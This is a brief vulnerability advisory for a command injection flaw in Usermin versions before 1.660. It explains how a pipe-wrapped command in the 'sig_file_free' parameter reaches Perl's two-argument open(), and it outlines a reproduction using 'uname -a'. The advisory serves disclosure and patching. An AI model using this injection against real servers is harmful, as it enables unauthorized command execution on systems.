Usermin Remote Code Execution Vulnerability via Signature File Configuration

A remote code execution vulnerability has been identified in Usermin versions 0.980 through 1.x prior to 1.660. The issue arises in the 'uconfig_save.cgi' script, where the 'sig_file_free' parameter is processed by the 'get_signature' function. This function uses the two-argument form of Perl's 'open()' function, allowing users to specify arbitrary file paths that can be executed as commands. When the 'sig_file_free' parameter is set with a command enclosed in pipes, the command is executed and the output is injected into the email composition interface.

Impact

Exploitation of this vulnerability allows authenticated users to execute arbitrary commands on the server with the privileges of the Usermin application.

Reproduction

To reproduce this vulnerability, an authenticated user can send a POST request to '/uconfig_save.cgi' with the 'sig_file_free' parameter containing a command piped to 'uname -a', for example. This request will execute the command and inject the output into the response, which can be verified in the 'reply_mail.cgi' interface.

Remediation

Users can upgrade to Usermin version 1.660 or later, where this vulnerability has been fixed.